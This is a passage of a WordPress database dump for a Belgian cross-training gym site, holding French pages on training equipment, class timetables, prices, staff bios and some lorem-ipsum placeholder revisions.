d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'publish', 'closed', 'open', '', 'les-seances-limelette', '', '', '2014-02-09 20:41:07', '2014-02-09 20:41:07', '', 0, 'http://www.crosstrainingcenter.be/?page_id=361', 0, 'page', '', 0),
(12, 1, '2013-05-23 18:14:43', '2013-05-23 18:14:43', '', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-23 18:14:43', '2013-05-23 18:14:43', '', 11, 'http://www.crosstrainingcenter.be/?p=12', 0, 'revision', '', 0),
(39, 1, '2013-06-13 16:23:30', '2013-06-13 16:23:30', '« Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines. Afin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h1><b><span style=\"text-decoration: underline;\">TRX Suspension Training </span></b></h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h1><b><span style=\"text-decoration: underline;\">Kettlebel</span></b></h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h1><b><span style=\"text-decoration: underline;\">ViPR</span></b></h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h1><b><span style=\"text-decoration: underline;\">RIP TRAINER</span></b></h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-13 16:23:30', '2013-06-13 16:23:30', '', 22, 'http://www.crosstrainingcenter.be/?p=39', 0, 'revision', '', 0),
(14, 1, '2013-05-23 18:15:58', '2013-05-23 18:15:58', ' ', '', '', 'publish', 'open', 'open', '', '14', '', '', '2015-04-21 08:50:05', '2015-04-21 08:50:05', '', 0, 'http://www.crosstrainingcenter.be/?p=14', 7, 'nav_menu_item', '', 0),
(15, 1, '2013-05-23 18:15:58', '2013-05-23 18:15:58', '', 'Notre philosophie', '', 'publish', 'open', 'open', '', '15', '', '', '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 0, 'http://www.crosstrainingcenter.be/?p=15', 3, 'nav_menu_item', '', 0),
(16, 1, '2013-05-23 18:15:58', '2013-05-23 18:15:58', '', 'Accueil', '', 'publish', 'open', 'open', '', 'acceuil', '', '', '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 0, 'http://www.crosstrainingcenter.be/?p=16', 1, 'nav_menu_item', '', 0),
(17, 1, '2013-05-23 18:13:57', '2013-05-23 18:13:57', '<h1>Prise de RDV :</h1>\r\nblablabla', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-23 18:13:57', '2013-05-23 18:13:57', '', 9, 'http://www.crosstrainingcenter.be/?p=17', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(18, 1, '2013-05-23 18:14:55', '2013-05-23 18:14:55', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-23 18:14:55', '2013-05-23 18:14:55', '', 11, 'http://www.crosstrainingcenter.be/?p=18', 0, 'revision', '', 0),
(359, 1, '2013-10-09 21:58:57', '2013-10-09 21:58:57', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-09 21:58:57', '2013-10-09 21:58:57', '', 11, 'http://www.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(19, 1, '2013-05-23 18:12:43', '2013-05-23 18:12:43', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 18:12:43', '2013-05-23 18:12:43', '', 5, 'http://www.crosstrainingcenter.be/?p=19', 0, 'revision', '', 0),
(20, 1, '2013-05-24 14:33:49', '2013-05-24 14:33:49', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n        <li>Formation Personal Trainer (Parnasse)</li>\r\n	<li>Formation Les mills Coach BodyBoxe</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'publish', 'closed', 'open', '', 'lequipe', '', '', '2015-04-21 09:46:39', '2015-04-21 09:46:39', '', 0, 'http://www.crosstrainingcenter.be/?page_id=20', 0, 'page', '', 0),
